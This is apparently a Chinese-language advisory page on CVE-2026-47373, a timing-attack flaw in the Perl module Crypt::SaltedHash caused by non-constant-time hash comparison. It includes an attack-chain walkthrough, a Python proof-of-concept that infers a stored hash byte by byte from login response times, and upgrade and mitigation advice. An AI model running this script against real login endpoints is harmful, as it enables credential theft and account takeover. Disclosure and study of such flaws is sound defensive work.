CVE-2026-47373 CVSS 7.5 高危

CVE-2026-47373 Crypt::SaltedHash 时序攻击漏洞

披露日期: 2026-05-20

来源: 9b29abf9-4ab0-4765-b253-1875cd9b441e

漏洞信息

漏洞编号

CVE-2026-47373

漏洞类型

时序攻击

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Crypt::SaltedHash (Perl)

漏洞概述

Crypt::SaltedHash 是 Perl 语言中用于生成和验证加盐哈希的模块。在 0.09 及之前的版本中，该模块存在严重的安全漏洞，极易受到时序攻击。由于模块使用了 Perl 内置的 eq 运算符来比较哈希值，这种比较方式会根据字符串匹配的长度返回不同的响应时间。攻击者可以利用这一细微的时间差异，通过网络请求逐步推断出存储的哈希值，进而威胁系统的机密性。

技术细节

该漏洞的核心在于非恒定时间的字符串比较机制。当服务器使用 eq 比较用户输入的哈希与服务器存储的哈希时，Perl 解释器会从左至右逐个字符进行比对。一旦发现不匹配，比较立即终止。这意味着，如果攻击者猜测的哈希前缀是正确的，服务器的处理时间会因多进行一次比较而略微延长。攻击者通过发送大量构造的请求并统计高精度的网络延迟，可以计算出每个字符的正确概率。通过逐字节爆破，攻击者最终可以完整还原出哈希值。随后，攻击者可利用彩虹表或离线暴力破解手段获取原始密码，导致账户被接管。

攻击链分析

STEP 1

侦察与识别

攻击者识别目标系统使用了 Crypt::SaltedHash Perl 模块，且版本低于等于 0.09。

STEP 2

流量捕获与分析

攻击者截获或构造发往服务器的验证请求，该请求包含哈希值参数。

STEP 3

时序分析

攻击者发送大量特制的哈希值进行尝试，利用 Perl `eq` 运算符的非恒定时间特性，测量服务器响应的微小时间差异。

STEP 4

哈希推导

通过统计时间延长的规律，攻击者逐个字节地推断出正确的哈希字符，最终还原出完整的哈希值。

STEP 5

凭据破解

利用还原出的哈希值，攻击者进行离线暴力破解或彩虹表查询，获取原始用户密码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for Timing Attack on Crypt::SaltedHash (Conceptual)
import requests
import time
import string

# Target endpoint (Hypothetical)
TARGET_URL = "http://vulnerable-app/login"

# Assume we know the hash format and length (e.g., SHA-256 hex: 64 chars)
HASH_LENGTH = 64
CHARSET = string.hexdigits

# Variable to store the recovered hash
recovered_hash = ""

print("[+] Starting Timing Attack...")

for i in range(HASH_LENGTH):
    best_char = None
    max_time = -1
    
    for char in CHARSET:
        # Construct payload: known prefix + current guess + padding
        # The padding ensures the comparison length is consistent if not checking length first
        test_hash = recovered_hash + char + "0" * (HASH_LENGTH - len(recovered_hash) - 1)
        
        payload = {"username": "admin", "password_hash": test_hash}
        
        # Measure request time
        start_time = time.time()
        try:
            requests.post(TARGET_URL, data=payload, timeout=5)
            end_time = time.time()
        except:
            end_time = time.time()
            
        duration = end_time - start_time
        
        # If this character took longer, it's likely the correct match
        if duration > max_time:
            max_time = duration
            best_char = char

    if best_char:
        recovered_hash += best_char
        print(f"[+] Position {i+1}/{HASH_LENGTH}: Found char '{best_char}' (Time: {max_time:.5f}s)")
    else:
        print("[-] Attack failed or network instability detected.")
        break

print(f"[+] Recovered Hash: {recovered_hash}")

影响范围

Crypt::SaltedHash <= 0.09

防御指南

临时缓解措施

建议立即升级受影响的 Perl 模块至修复版本（0.10及以上）。如果无法立即升级，应在应用层面对哈希比较逻辑进行重写，确保使用恒定时间算法进行比较，防止通过时间差泄露信息。此外，建议在认证接口增加速率限制机制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表